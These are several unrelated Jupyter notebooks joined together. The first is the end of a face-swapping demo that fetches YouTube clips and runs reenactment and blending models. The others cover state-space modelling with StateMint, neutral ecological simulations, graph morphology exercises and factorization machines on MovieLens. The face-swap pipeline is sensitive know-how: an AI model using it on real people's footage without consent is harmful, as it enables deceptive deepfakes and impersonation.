reenactment_model = os.path.join(weights_dir, 'v2/nfv_msrunet_256_1_2_reenactment_v2.1.pth')
completion_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_inpainting_v2.pth')
blending_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_blending_v2.pth')
criterion_id_path = os.path.join(weights_dir, 'v2/vggface2_vgg19_256_1_2_id.pth')
criterion_id = VGGLoss(criterion_id_path)
face_swapping = FaceSwapping(
detection_model=detection_model, pose_model=pose_model, lms_model=lms_model,
seg_model=seg_model, reenactment_model=reenactment_model,
completion_model=completion_model, blending_model=blending_model,
criterion_id=criterion_id,
finetune=True, finetune_save=True, finetune_iterations=finetune_iterations,
seg_remove_mouth=finetune_iterations, batch_size=16, seg_batch_size=48,
encoder_codec='mp4v')
###Output
_____no_output_____
###Markdown
Optional: Download source video from YouTubeYou can change the source URL, start and end times [hh:mm:ss]. Alternatively, manually upload an image or video to **_data_** (in the menu to the left) and rename to **_source.jpg_** or **_source.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples.
###Code
source_url = 'https://www.youtube.com/watch?v=z_IdXHSmYNs' #@param {type:"string"}
source_start = '00:00:25' #@param {type:"string"}
source_end = '00:00:30' #@param {type:"string"}
!mkdir -p /content/data
!rm -dr /content/data/source*
!youtube-dl $source_url --merge-output-format mp4 -o /content/data/source_tmp.mp4
!ffmpeg -y -i /content/data/source_tmp.mp4 -ss $source_start -to $source_end -r 25 /content/data/source.mp4
!rm /content/data/source_tmp.mp4
display_video('/content/data/source.mp4')
###Output
_____no_output_____
###Markdown
Optional: Download target video from YouTubeYou can change the target URL, start and end times [hh:mm:ss]. Alternatively, manually upload a video to **_data_** (in the menu to the left) and rename to **_target.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples.
###Code
target_url = 'https://youtu.be/HOyMZO_X7xE' #@param {type:"string"}
target_start = '00:00:00' #@param {type:"string"}
target_end = '00:00:06' #@param {type:"string"}
!mkdir -p /content/data
!rm -dr /content/data/target*
!youtube-dl $target_url --merge-output-format mp4 -o /content/data/target_tmp.mp4
!ffmpeg -i /content/data/target_tmp.mp4 -ss $target_start -to $target_end -r 25 /content/data/target.mp4
!rm /content/data/target_tmp.mp4
#display_video('/content/data/target.mp4')
###Output
_____no_output_____
###Markdown
Do face swapping
###Code
# Do face swapping
#@markdown ---
#@markdown Toggle whether to finetune the reenactment generator:
finetune = True #@param {type:"boolean"}
#@markdown Source selection method ["longest" | sequence number]:
select_source = 'longest' #@param {type:"string"}
#@markdown Target selection method ["longest" | sequence number]:
select_target = 'longest' #@param {type:"string"}
#@markdown ---
source_path = '/content/data/source.mp4'
target_path = '/content/data/target.mp4'
output_tmp_path = '/content/data/output_tmp.mp4'
output_path = '/content/output.mp4'
face_swapping(source_path, target_path, output_tmp_path,
select_source, select_target, finetune)
# Encode with audio and display result
encode_audio(output_tmp_path, target_path, output_path)
os.remove(output_tmp_path)
display_video(output_path)
###Output
_____no_output_____ |
python/Example.ipynb | ###Markdown
StateMintThere are two methods for using StateMint, one is to install the python package on your computer and to write python scripts solve and interact with the solution. The other is to use the web interface. This notebook will focus on how to interact with StateMint in a python script.Before we begin we need to import a few libraries, including `StateMint`.
###Code
import matplotlib.pyplot as plt
import numpy as np
import StateMint
from StateMint import to_numpy
import sympy
sympy.init_printing()
%matplotlib inline
###Output
_____no_output_____
###Markdown
Now that the required libraries have been imported we can start working on a problem. In this case we will be working on the problem set forth in the [tutorial](https://github.com/CameronDevine/StateMint/blob/tutorial/tutorial.md). This problem consists of a motor powering a pump through a flexible shaft. This pump pushes water through an enbow with a known resistance and out into the atmosphere. A diagram of the physical system can be seen below,  The following equations for this system were found in the tutorial:
###Code
InVars = [
'Vs']
StVarElEqns = [
"tk' = kt * wk"]
OtherElEqns = [
'vR = R * iR',
"vL = L * iL'",
'i1 = -Kv * t2',
'w2 = Kv * v1',
'w3 = Q4 / -D',
'P4 = t3 / D',
'QR = PR / Rf']
Constraints = [
'iL = i1',
'iR = i1',
't2 = -tk',
't3 = tk',
'Q4 = QR',
'v1 = Vs - vR - vL',
'wk = w2 - w3',
'PR = P4']
OutputVars = [
'QR']
###Output
_____no_output_____
###Markdown
Now using the `StateMint.Solve` command the solution can be found.
###Code
sys = StateMint.Solve(InVars, StVarElEqns, OtherElEqns, Constraints, OutputVars)
###Output
_____no_output_____
###Markdown
Now that the solution has been found, different parts of the equation can be viewed including the $A$ matrix,
###Code
sys.A
###Output
_____no_output_____
###Markdown
the state equation,
###Code
sys.StateEq
###Output
_____no_output_____
###Markdown
or the transfer function,
###Code
sys.TF
###Output
_____no_output_____
###Markdown
The results can also be viewed in other languages such as LaTeX,
###Code
print(sympy.latex(sys.A))
###Output
\left[\begin{matrix}- \frac{kt \left(D^{2} Kv^{2} R Rf - 1\right)}{D^{2} Rf \left(Kv^{2} L kt + 1\right)}\end{matrix}\right]
###Markdown
or Matlab,
###Code
print(sympy.octave_code(sys.A))
###Output
-kt.*(D.^2.*Kv.^2.*R.*Rf - 1)./(D.^2.*Rf.*(Kv.^2.*L.*kt + 1))
###Markdown
Other `sympy` functions can also be used to manipulate the equations if desired. However at this point we will substitute in values for the constants to allow us to simulate the system. This process starts by defining the values for each constant.
###Code
Values = {
'R': 5,
'L': 0.1,
'Kv': 1000,
'kt': 10,
'D': 0.0015,
'Rf': 4e6
}
###Output
_____no_output_____
###Markdown
Now the state equation matricies can be converted to `numpy` matricies.
###Code
A = to_numpy.matrix(sys.A, Values)
B = to_numpy.matrix(sys.B, Values)
C = to_numpy.matrix(sys.C, Values)
D = to_numpy.matrix(sys.D, Values)
###Output
_____no_output_____
###Markdown
A Forward Euler method can now be used to simulate the system given the initial condition `x0`.
###Code
dt = 0.0001
x0 = np.matrix([[0]])
tf = 0.15
Vs = np.matrix([[12]])
x = np.matrix(np.ndarray((A.shape[0], int(tf/dt) + 1)))
y = np.matrix(np.ndarray((C.shape[0], int(tf/dt) + 1)))
x[:,0] = x0
y[:,0] = C * x0 + D * Vs
for i in range(int(tf/dt)):
x[:,i+1] = x[:,i] + dt * (A * x[:,i] + B * Vs)
y[:,i+1] = C * x[:,i+1] + D * Vs
###Output
_____no_output_____
###Markdown
This data can now be plotted to view the system's time response.
###Code
plt.plot(np.arange(0, tf, dt), y.T.A[:,0])
plt.ylabel('$Q_R(t)$ (L/s)')
plt.xlabel('time (s)')
###Output
_____no_output_____
###Markdown
StateMintThere are three methods for using StateMint, one is to install the python package on your computer and to write python scripts to solve and interact with the solution. The others are to use the web interface or the Mathematica package. This notebook will focus on how to interact with StateMint in a python script.Before we begin we need to import a few libraries, including `StateMint`.
###Code
import matplotlib.pyplot as plt
import numpy as np
import StateMint
from StateMint import to_numpy
import sympy
sympy.init_printing()
%matplotlib inline
###Output
_____no_output_____
###Markdown
Now that the required libraries have been imported we can start working on a problem. In this case we will be working on the problem set forth in the [tutorial](https://github.com/CameronDevine/StateMint/blob/master/tutorial.md). This problem consists of a motor powering a pump through a flexible shaft. This pump pushes water through an elbow with a known resistance and out into the atmosphere. A diagram of the physical system can be seen below,  The following equations for this system were found in the tutorial:
###Code
InVars = [
'Vs']
StVarElEqns = [
"tk' = kt * wk"]
OtherElEqns = [
'vR = R * iR',
"vL = L * iL'",
'i1 = -Kv * t2',
'w2 = Kv * v1',
'w3 = Q4 / -D',
'P4 = t3 / D',
'QR = PR / Rf']
Constraints = [
'iL = i1',
'iR = i1',
't2 = -tk',
't3 = tk',
'Q4 = QR',
'v1 = Vs - vR - vL',
'wk = w2 - w3',
'PR = P4']
OutputVars = [
'QR']
###Output
_____no_output_____
###Markdown
Now using the `StateMint.Solve` command the solution can be found.
###Code
sys = StateMint.Solve(InVars, StVarElEqns, OtherElEqns, Constraints, OutputVars)
###Output
_____no_output_____
###Markdown
Now that the solution has been found, different parts of the equation can be viewed, including the $A$ matrix,
###Code
sys.A
###Output
_____no_output_____
###Markdown
the state equation,
###Code
sys.StateEq
###Output
_____no_output_____
###Markdown
or the transfer function,
###Code
sys.TF
###Output
_____no_output_____
###Markdown
The results can also be viewed in other languages such as LaTeX,
###Code
print(sympy.latex(sys.A))
###Output
\left[\begin{matrix}- \frac{kt \left(D^{2} Kv^{2} R Rf - 1\right)}{D^{2} Rf \left(Kv^{2} L kt + 1\right)}\end{matrix}\right]
###Markdown
or Matlab,
###Code
print(sympy.octave_code(sys.A))
###Output
-kt.*(D.^2.*Kv.^2.*R.*Rf - 1)./(D.^2.*Rf.*(Kv.^2.*L.*kt + 1))
###Markdown
Other `sympy` functions can also be used to manipulate the equations if desired. However at this point we will substitute in values for the constants to allow us to simulate the system. This process starts by defining the values for each constant.
###Code
Values = {
'R': 5,
'L': 0.1,
'Kv': 1000,
'kt': 10,
'D': 0.0015,
'Rf': 4e6
}
###Output
_____no_output_____
###Markdown
Now the state equation matricies can be converted to `numpy` matricies.
###Code
A = to_numpy.matrix(sys.A, Values)
B = to_numpy.matrix(sys.B, Values)
C = to_numpy.matrix(sys.C, Values)
D = to_numpy.matrix(sys.D, Values)
###Output
_____no_output_____
###Markdown
A Forward Euler method can now be used to simulate the system given the initial condition `x0`.
###Code
dt = 0.0001
x0 = np.matrix([[0]])
tf = 0.15
Vs = np.matrix([[12]])
x = np.matrix(np.ndarray((A.shape[0], int(tf/dt) + 1)))
y = np.matrix(np.ndarray((C.shape[0], int(tf/dt) + 1)))
x[:,0] = x0
y[:,0] = C * x0 + D * Vs
for i in range(int(tf/dt)):
x[:,i+1] = x[:,i] + dt * (A * x[:,i] + B * Vs)
y[:,i+1] = C * x[:,i+1] + D * Vs
###Output
_____no_output_____
###Markdown
This data can now be plotted to view the system's time response.
###Code
plt.plot(np.arange(0, tf, dt), y.T.A[:,0])
plt.ylabel('$Q_R(t)$ (L/s)')
plt.xlabel('time (s)')
###Output
_____no_output_____ |
Fisher Mehta neutral model annotated.ipynb | ###Markdown
IntroductionOne way of generating a neutral time series is considering a lattice of N individuals on which every time step one individual is replaced by another. Each individual of the lattice has an equal probability of being replaced (probability is $1/N$). The disappearance of the 1rst species can be interpreted as the result of either death or emigration. The replacing individual is either the result of immigration or growth. The probability of immigration depends on the immigration rate ($0 \leq \lambda \leq 1$). In case of an immigration event, all species of the external species pool $S$ have an equalprobability of immigrating. The probability of a growth event is thus given by the remaining $1 - \lambda$. Incase of growth, every individual has an equal probability of growing. Time series generated in this way depend on three variables: the length of the simulation time $T$, the immigration probability $\lambda$ and the number of individuals $N$. We study the effect of these three variables on both neutrality measures. Standard imports
###Code
# Data manipulation
import pandas as pd
import numpy as np
# Options for pandas
pd.options.display.max_columns = 50
pd.options.display.max_rows = 30
from IPython import get_ipython
ipython = get_ipython()
# autoreload extension
if 'autoreload' not in ipython.extension_manager.loaded:
%load_ext autoreload
%autoreload 2
import matplotlib.pyplot as plt
from matplotlib import gridspec
%matplotlib inline
import time
np.random.seed(int(time.time()))
###Output
_____no_output_____
###Markdown
Specific imports
###Code
from timeseries_plotting import PlotTimeseries
from noise_properties_plotting import PiecewiseNormalize
from enum import Enum
###Output
_____no_output_____
###Markdown
Settings figures
###Code
from elife_settings import set_elife_settings, ELIFE
set_elife_settings()
###Output
_____no_output_____
###Markdown
Figure neutrality
###Code
class NeutralityTest(Enum):
KULLBACKLEIBLER = 1
COVARIANCE = 2
def plot_neutrality(f, type=NeutralityTest.KULLBACKLEIBLER, ax=0, ax_clb=0):
if isinstance(f, str):
df = pd.read_csv(f, index_col=0)
elif isinstance(f, list): # average of all files
df = pd.DataFrame(np.nanmedian([pd.read_csv(fi, index_col=0).values for fi in f], axis=0),
columns=pd.read_csv(f[0], index_col=0).columns,
index=pd.read_csv(f[0], index_col=0).index)
df[df == np.inf] = 1e4
if ax == 0:
fig = plt.figure()
gs = gridspec.GridSpec(1, 2, width_ratios=[9, 1], wspace=0.3)
ax = fig.add_subplot(gs[0])
ax_clb = fig.add_subplot(gs[1])
ax.set_facecolor('lightgrey')
if type == NeutralityTest.KULLBACKLEIBLER:
vmin = -1
vmax = 3
with np.errstate(divide='ignore'):
log_KL = np.log10(df.T)
mat = ax.matshow(log_KL, origin='lower', cmap='Blues_r',
aspect='auto', vmin=vmin, vmax=vmax)
elif type == NeutralityTest.COVARIANCE:
vmin = -5
vmax = 0 # pvalue is max 1 = 1e0
norm = PiecewiseNormalize([vmin, np.log10(0.05), vmax], [0, 0.5, 1])
with np.errstate(divide='ignore'):
log_nct = np.log10(df.T)
mat = ax.matshow(log_nct, origin='lower', norm=norm,
cmap='seismic_r', aspect='auto', vmin=vmin, vmax=vmax)
skiplabel = 0
ax.set_xticks(range(0, df.shape[0], (skiplabel+1)))
ax.set_xticklabels(['%d' % i for i in df.index][::(skiplabel+1)])
ax.set_yticks(range(0, df.shape[1], (skiplabel+1)))
ax.set_yticklabels(
['%.3f' % i for i in df.columns.astype(float)][::(skiplabel+1)])
ax.set_xlabel('Size community')
ax.set_ylabel(r'Immigration probability $\lambda$')
if ax_clb != 0:
plt.colorbar(mat, cax=ax_clb)
if type == NeutralityTest.KULLBACKLEIBLER:
ax_clb.set_title(r'log$_{10}$(D$_{KL}$)')
ax_clb2 = ax_clb.twinx()
ax_clb2.yaxis.set_ticks_position('right')
ax_clb.yaxis.set_ticks_position('left')
ax_clb2.yaxis.set_ticks([0.05, 0.95])
ax_clb2.set_ylim([0, 1])
ax_clb2.yaxis.set_ticklabels(['neutral', 'niche'])
elif type == NeutralityTest.COVARIANCE:
ax_clb.set_title(r'log$_{10}$($p_{NCT}$)')
ax_clb2 = ax_clb.twinx()
ax_clb2.yaxis.set_ticks_position('right')
ax_clb.yaxis.set_ticks_position('left')
ax_clb2.yaxis.set_ticks([1+(vmin + np.log10(0.05))/(vmax - vmin)/2,
1+(vmax + np.log10(0.05))/(vmax - vmin)/2])
ax_clb2.set_ylim([0, 1])
ax_clb2.yaxis.set_ticklabels(['niche', 'neutral'])
###Output
_____no_output_____
###Markdown
Generating neutral timeseries
###Code
new = False
lamda = 0.01 # immigration probability
T = int(1e7)
tskip = 999
S = 50 # amount of different species
J = 5000 # Number of individuals in the community
f = 'test_neutral4.txt'
def neutral_timeseries(S, lamda, J, tskip=1e3, T=int(1e6), f=0):
initcond = np.arange(J/S, J+1, J/S)
x = np.copy(initcond)
x_ts = np.copy(initcond)
# save x as cumulative distribution, it makes simulations faster
for i in range(T):
if i % 1e6 == 0:
print(i)
if np.random.uniform(0, 1) < lamda: # immigration from outside pool
immi = int(np.random.uniform()*S)
x[immi:] += 1
else:
growing = int(np.random.uniform()*J)
x[x > growing] += 1
dead = int(np.random.uniform()*(J+1))
x[x > dead] -= 1
if i % (tskip + 1) == 0:
x_ts = np.vstack((x_ts, x))
# transform cumulative distribution into abundances
for i in range(1, S):
x_ts[:, -i] = x_ts[:, -i] - x_ts[:, -i-1]
if f != 0:
np.savetxt(f, x_ts, fmt='%d')
return x_ts
if new:
neutral_timeseries(S, lamda, J, tskip, T, f)
###Output
_____no_output_____
###Markdown
Plot some neutral timeseries.
###Code
fig = plt.figure()
for i, l in enumerate(['', '2', '3', '4'], start=1):
ax = fig.add_subplot(2, 2, i)
ts_np = np.loadtxt('results/neutral_timeseries/ts_neutral' + l + '.txt').T
ts = pd.DataFrame(
ts_np, columns=['species_%d' % i for i in range(1, ts_np.shape[1]+1)])
ts['time'] = range(len(ts))
PlotTimeseries(ts, ax=ax)
plt.show()
###Output
findfont: Font family ['Open Sans'] not found. Falling back to DejaVu Sans.
###Markdown
Calculate neutrality measures for timeseries.
###Code
def neutral_measures(fKL, fNCT,
Js=[50, 100, 500, 1000, 2500, 5000],
lamdas=[0, 0.001, 0.01, 0.1, 0.25, 0.5, 0.75, 1]):
KL = np.zeros([len(Js), len(lamdas)])
NCT = np.zeros([len(Js), len(lamdas)])
for i, J in enumerate(Js):
for j, lamda in enumerate(lamdas):
print(J, lamda)
x_ts = neutral_timeseries(S, lamda, J, tskip=0, T=int(1e4))
KL[i, j] = KullbackLeibler_neutrality(x_ts[:, :-1])
for k in range(len(x_ts)):
s = sum(x_ts[k])
if s > 0:
x_ts[k] /= s
NCT[i, j] = neutral_covariance_test(
x_ts, ntests=500, method='Kolmogorov')
KL = pd.DataFrame(KL, index=Js, columns=lamdas)
KL.to_csv(fKL)
NCT = pd.DataFrame(NCT, index=Js, columns=lamdas)
NCT.to_csv(fNCT)
return KL, NCT
###Output
_____no_output_____
###Markdown
Plot the neutrality measures.
###Code
fig = plt.figure(figsize=(ELIFE.TEXTWIDTH, 3))
gs = gridspec.GridSpec(2, 4, wspace=0.05, hspace=0.3,
right=0.82, bottom=0.18, top=0.9)
gs_clb = gridspec.GridSpec(2, 1, hspace=0.35, top=0.9,
bottom=0.18, left=0.88, right=0.9)
gs_tot = gridspec.GridSpec(1, 1, top=0.95, bottom=0.08, left=0.07, right=0.82)
ax_clb_KL = fig.add_subplot(gs_clb[0])
ax_clb_NCT = fig.add_subplot(gs_clb[1])
for i, s in enumerate(['1e4', '1e5', '1e6', '1e7']):
ax_KL = fig.add_subplot(gs[0, i])
ax_NCT = fig.add_subplot(gs[1, i])
ax_KL.set_title('T = 10$^{%d}$' % int(s[-1]))
path = 'results/neutral_timeseries/'
if i == 0:
plot_neutrality([path + 'KL-%s-' % s + '%d.csv' % j for j in range(0, 6)],
ax=ax_KL, ax_clb=ax_clb_KL)
plot_neutrality([path + 'NCT-%s-' % s + '%d.csv' % j for j in range(0, 6)],
type=NeutralityTest.COVARIANCE,
ax=ax_NCT, ax_clb=ax_clb_NCT)
ax_KL.tick_params(axis="both", bottom=True, labelbottom=False, top=False, labeltop=False,
left=True, labelleft=True)
ax_NCT.tick_params(axis="both", bottom=True, labelbottom=True, top=False, labeltop=False,
left=True, labelleft=True)
ax_KL.text(-0.08, 1.15, 'A', transform=ax_KL.transAxes,
fontsize=10, fontweight='bold', va='top', ha='right')
ax_NCT.text(-0.08, 1.15, 'B', transform=ax_NCT.transAxes,
fontsize=10, fontweight='bold', va='top', ha='right')
else:
plot_neutrality([path + 'KL-%s-' % s + '%d.csv' % j for j in range(0, 6)],
ax=ax_KL)
plot_neutrality([path + 'NCT-%s-' % s + '%d.csv' % j for j in range(0, 6)],
type=NeutralityTest.COVARIANCE,
ax=ax_NCT)
ax_KL.tick_params(axis="both", bottom=True, labelbottom=False, top=False, labeltop=False,
left=True, labelleft=False)
ax_NCT.tick_params(axis="both", bottom=True, labelbottom=True, top=False, labeltop=False,
left=True, labelleft=False)
ax_NCT.tick_params(axis='x', rotation=90)
ax_KL.set_xlabel('')
ax_NCT.set_xlabel('')
ax_KL.set_ylabel('')
ax_NCT.set_ylabel('')
ax = fig.add_subplot(gs_tot[0], frameon=False)
ax.tick_params(axis="both", bottom=False, labelbottom=False,
left=False, labelleft=False)
ax.set_xlabel('Size community', x=1, ha='right')
ax.set_ylabel('Immigration probability $\lambda$')
plt.show()
###Output
findfont: Font family ['Open Sans'] not found. Falling back to DejaVu Sans.
|
files/Morpho_TD3.ipynb | ###Markdown
Le troisième TD de morpho-math Début: les environnements nécessaires
###Code
## pour avoir des figures "en ligne"
%matplotlib inline
## le minimum syndical
import matplotlib.pylab as plt
import numpy as np
from copy import deepcopy
import morphograph as mg
from morphograph import Graph
def changeAdjacency(graph,type='4'):
'''
Change l'adjacence d'un graphe
'''
nodes=graph.get_nodes() ## récupère les sommets
W = graph.get_W()
H = graph.get_H()
edges = [] ## structure d'arêtes
## "4-connectivité"
if (type == '4'):
for y in range(0,H-1):
for x in range(0,W-1):
i = y * W + x
edges.append([i,i+1,0]) # toutes les arêtes sont valuées à zéro
edges.append([i,i+W,0]) # pour le moment
# arêtes de la fin
for x in range(0,W-1):
i = (H-1)*W + x
edges.append([i,i+1,0])
for y in range(0,H-1):
i = y * W + (W-1)
edges.append([i,i+W,0])
## "8-connectivité"
if (type == '8'):
for y in range(0,H-1):
for x in range(1,W-1):
i = y * W + x
edges.append([i,i+1,0]) # toutes les arêtes sont valuées à zéro
edges.append([i,i+W,0]) # pour le moment
edges.append([i,i+W+1,0]) # NW-SE
edges.append([i,i+W-1,0]) # NE-SW
# arêtes verticales début et fin
for y in range(0,H-1):
i = y * W + (W-1)
edges.append([i,i+W,0])
edges.append([i,i+W-1,0])
i = y * W
edges.append([i,i+1,0])
edges.append([i,i+W+1,0])
edges.append([i,i+W,0])
# arête horizontales fin
for x in range(0,W-1):
i = (H-1)*W + x
edges.append([i,i+1,0])
if (type == 'H'): ## horizontal adjacence
for y in range(0,H-1):
for x in range(0,W-1):
i = y * W + x
edges.append([i,i+1,0]) # arètes horizontales seulement
# arêtes horizontales de la fin
for x in range(0,W-1):
i = (H-1)*W + x
edges.append([i,i+1,0])
if (type == 'V'): ## vertical adjacence
for y in range(0,H-1):
for x in range(0,W-1):
i = y * W + x
edges.append([i,i+W,0]) # arêtes verticales seulement
# arêtes verticales de la fin
for y in range(0,H-1):
i = y * W + (W-1)
edges.append([i,i+W,0])
### Definissez aussi les deux diagonales comme deux adjacences séparées.
if (type == 'D1'):
for y in range(0,H-1):
for x in range(1,W-1):
i = y * W + x
edges.append([i,i+W+1,0]) # NW-SE
# arêtes verticales début et fin
for y in range(0,H-1):
i = y * W
edges.append([i,i+W+1,0])
## "8-connectivité"
if (type == 'D2'):
for y in range(0,H-1):
for x in range(1,W-1):
i = y * W + x
edges.append([i,i+W-1,0]) # NE-SW
# arêtes verticales début et fin
for y in range(0,H-1):
i = y * W + (W-1)
edges.append([i,i+W-1,0])
return(Graph(edges,nodes,W,H))
###Output
_____no_output_____
###Markdown
Vérification des adjacences
###Code
Bands=mg.read_graph("images/bands.txt")
Bands.display()
BandsH = changeAdjacency(Bands,"H")
BandsH.display()
BandsV = changeAdjacency(Bands,"V")
BandsV.display()
Bands8 = changeAdjacency(Bands,"8")
Bands8.display()
plt.show()
BandsD1 = changeAdjacency(Bands,"D1")
BandsD1.display()
plt.show()
BandsD1 = changeAdjacency(Bands,"D2")
BandsD1.display()
plt.show()
###Output
_____no_output_____
###Markdown
Exemple d'utilisation de la classe Graph
###Code
import importlib
import morphograph
importlib.reload(morphograph)
FP = mg.read_graph("images/FP.txt")
FPH = changeAdjacency(FP,"H")
FPcloH=mg.fermeture(FPH)
FPV = changeAdjacency(FP,"V")
FPcloV = mg.fermeture(FPV)
FPD1 = changeAdjacency(FP,"D1")
FPcloD1=mg.fermeture(FPD1)
FPD2 = changeAdjacency(FP,"D2")
FPcloD2=mg.fermeture(FPD2)
###Output
_____no_output_____
###Markdown
Using 4 different closings
###Code
FPcloH.show(inv=True)
FPcloV.show(inv=True)
FPcloD1.show(inv=True)
FPcloD2.show(inv=True)
###Output
_____no_output_____
###Markdown
compute the inf between two images
###Code
## this assumes the data is in the same order for both images
def applyDualNodeOperator(g1,g2, dual_op_, verify=True):
"""
applies a generic scalar Dual operator on the nodes of G1 and G2 and returns a new graph
applique un operateur sur les sommets de deux graphes G1 et G2 et produit un nouveau graphe
"""
mynodes_out = deepcopy(g1.get_nodes())
mynodes_in = g2.get_nodes() # read only, no need to copy
W = g1.get_W()
H = g1.get_H()
if (not verify):
for i in range(0,W*H):
mynodes_out[i][2] = dual_op_(my_nodes_out[i][2],my_nodes_in[i][2])
else:
for i in range(0,g1.get_H()*g1.get_W()):
if ((mynodes_out[i][0] == mynodes_in[i][0]) and (mynodes_out[i][1] == mynodes_in[i][1])):
mynodes_out[i][2] = dual_op_(mynodes_out[i][2],mynodes_in[i][2])
return(Graph(g1.get_edges(), mynodes_out, W,H))
def inf(g1, g2, verify=True):
"""
Pointwise infimum
Minimum point à point
"""
return(applyDualNodeOperator(g1,g2,min, verify=verify))
def sup(g1, g2, verify=True):
"""
Pointwise supremum
maximum point à point
"""
return(applyDualNodeOperator(g1,g2,max, verify=verify))
def sub_op(v1,v2):
return(v1-v2)
def sub(g1,g2, verify=True):
"""
Pointwise subtraction
Soustraction point à point
"""
return(applyDualNodeOperator(g1,g2,sub_op,verify=verify))
FP=mg.read_graph("images/FP.txt")
FP.show(inv=True)
FPclo4 = mg.fermeture(FP)
FPclo4.show(inv=True)
FPH = changeAdjacency(FP,"H")
FPcloH=mg.fermeture(FPH)
FPV = changeAdjacency(FP,"V")
FPcloV = mg.fermeture(FPV)
FPcloHV = inf(FPcloV,FPcloH)
FPcloHV.show(inv=True)
minVH = inf(FPcloH,FPcloV)
minD1D2 = inf(FPcloD1,FPcloD2)
minOrient = inf(minVH,minD1D2)
fig=plt.figure(figsize=(16,16))
ax1 = fig.add_subplot(1,2,1)
ax1.axis('off')
ax1.imshow(FP.image(),cmap="gray_r")
ax2 = fig.add_subplot(1,2,2)
ax2.axis('off')
ax2.imshow(minOrient.image(),cmap="gray_r")
gdiff = sub(minOrient, FP)
gdiff.show(inv=True)
## Cas de l'ouverture
FP=mg.read_graph("images/FP.txt")
FP.show(inv=True)
FPopen4 = mg.ouverture(FP)
FPopen4.show(inv=True)
FPH = changeAdjacency(FP,"H")
FPopeH=mg.ouverture(FPH)
FPV = changeAdjacency(FP,"V")
FPopeV = mg.ouverture(FPV)
FPopeHV = sup(FPopeV,FPopeH)
FPopeHV.show(inv=True)
FPD1 = changeAdjacency(FP,"D1")
FPopeD1=mg.ouverture(FPD1)
FPD2 = changeAdjacency(FP,"D2")
FPopeD2 = mg.ouverture(FPD2)
FPopeHV = sup(FPopeV,FPopeH)
FPopeD = sup(FPopeD1,FPopeD2)
FPopeDir = sup(FPopeHV,FPopeD)
FPopeDir.show(inv=True)
dat=gdiff.image()
dat.max()
FPHclo=erode(FPHdil)
FPHclo.show(inv=True)
###Output
_____no_output_____
###Markdown
OperateursOn note $\delta_H(G)$ la dilatation horizontale du graphe $G$On note $\varepsilon_H(G)$ l'érosion horizontale du graphe $G$On node $\psi_H(G)=\varepsilon_H(\delta_H(G))$ la fermeture horizontale du graphe $G$On note $\gamma_H(G)=\delta_H(\varepsilon_H(G))$ l'ouverture horizontale du graphe $G$Calculez $\gamma_H(G)$...
###Code
FPHero=erode(FPH)
FPHopen=dilate(FPHero)
FPHopen.show(inv=True)
###Output
_____no_output_____ |
examples/ml-100k-extended.ipynb | ###Markdown
User Relation Block to express dataSee [\[Rendle 2013\]](http://www.vldb.org/pvldb/vol6/p337-rendle.pdf) how comlexity dcrease drastically in this case (and most cases with bipartite graph structure).
###Code
# Create RelationBlock.
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html
train_blocks = []
test_blocks = []
for source, target in [(df_train, train_blocks), (df_test, test_blocks)]:
unique_users, user_map = np.unique(source.user_id, return_inverse=True)
target.append(
RelationBlock(user_map, augment_user_id(unique_users))
)
unique_movies, movie_map = np.unique(source.movie_id, return_inverse=True)
target.append(
RelationBlock(movie_map, augment_movie_id(unique_movies))
)
if use_date:
X_date_train = date_encoder.to_sparse(df_train.timestamp.dt.date.values)
X_date_test = date_encoder.to_sparse(df_test.timestamp.dt.date.values)
else:
X_date_train = None
X_date_test = None
###Output
_____no_output_____
###Markdown
Regression
###Code
group_shapes = [len(date_encoder)] + user_encoder.encoder_shapes + movie_encoder.encoder_shapes
fm = myfm.MyFMRegressor(rank=10)
fm.fit(
X_date_train, df_train.rating.values, X_rel=train_blocks,
group_shapes=group_shapes,
X_test=X_date_test, X_rel_test=test_blocks,
y_test=df_test.rating.values,
n_iter=512, n_kept_samples=512
);
test_predictions = fm.predict(X_date_test, test_blocks)
rmse = (
(test_predictions - df_test.rating.values)**2
).mean() ** 0.5
mae = np.abs(test_predictions - df_test.rating).mean()
# Note the improvement from "id_only" case.
# Compare this with methods like ones in https://paperswithcode.com/sota/collaborative-filtering-on-movielens-100k
print('rmse={}, mae={}'.format(rmse, mae))
###Output
rmse=0.8835596352777759, mae=0.6942521867272365
###Markdown
Ordered Probit Regression
###Code
fm_probit = myfm.MyFMOrderedProbit(rank=10)
fm_probit.fit(
X_date_train, df_train.rating.values - 1, X_rel=train_blocks,
group_shapes=group_shapes,
n_iter=512, n_kept_samples=512
);
test_prediction_ordered_prob = fm_probit.predict_proba(X_date_test, test_blocks)
test_prediction_ordered_mean = 1 + test_prediction_ordered_prob.dot(np.arange(5)) # class 0 => rating 1 shift
rmse = (
(test_prediction_ordered_mean - df_test.rating.values) **2
).mean() ** 0.5
mae = np.abs(test_prediction_ordered_mean - df_test.rating).mean()
test_predictions = fm.predict(X_date_test, test_blocks)
print('rmse={}, mae={}'.format(rmse, mae))
# If we use the original data format, it takes much more!
X_original_format = []
if use_date:
X_original_format.append(X_date_train)
X_original_format.extend(
[rel.data[rel.original_to_block] for rel in train_blocks]
)
X_original_format = sps.hstack(X_original_format, format='csr')
fm_rawformat = myfm.MyFMRegressor(rank=10).fit(
X_original_format, df_train.rating,
group_shapes=group_shapes, n_iter=6, n_kept_samples=1
)
# They shoud be same up to floating point artifact.
fm_rawformat.predictor_.samples[-1].V - fm.predictor_.samples[5].V
###Output
_____no_output_____
###Markdown
User Relation Block to express dataSee [\[Rendle 2013\]](http://www.vldb.org/pvldb/vol6/p337-rendle.pdf) how comlexity dcrease drastically in this case (and most cases with bipartite graph structure).
###Code
# Create RelationBlock.
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.unique.html
train_blocks = []
test_blocks = []
for source, target in [(df_train, train_blocks), (df_test, test_blocks)]:
unique_users, user_map = np.unique(source.user_id, return_inverse=True)
target.append(
RelationBlock(user_map, augment_user_id(unique_users))
)
unique_movies, movie_map = np.unique(source.movie_id, return_inverse=True)
target.append(
RelationBlock(movie_map, augment_movie_id(unique_movies))
)
if use_date:
X_date_train = date_encoder.to_sparse(df_train.timestamp.dt.date.values)
X_date_test = date_encoder.to_sparse(df_test.timestamp.dt.date.values)
else:
X_date_train = None
X_date_test = None
###Output
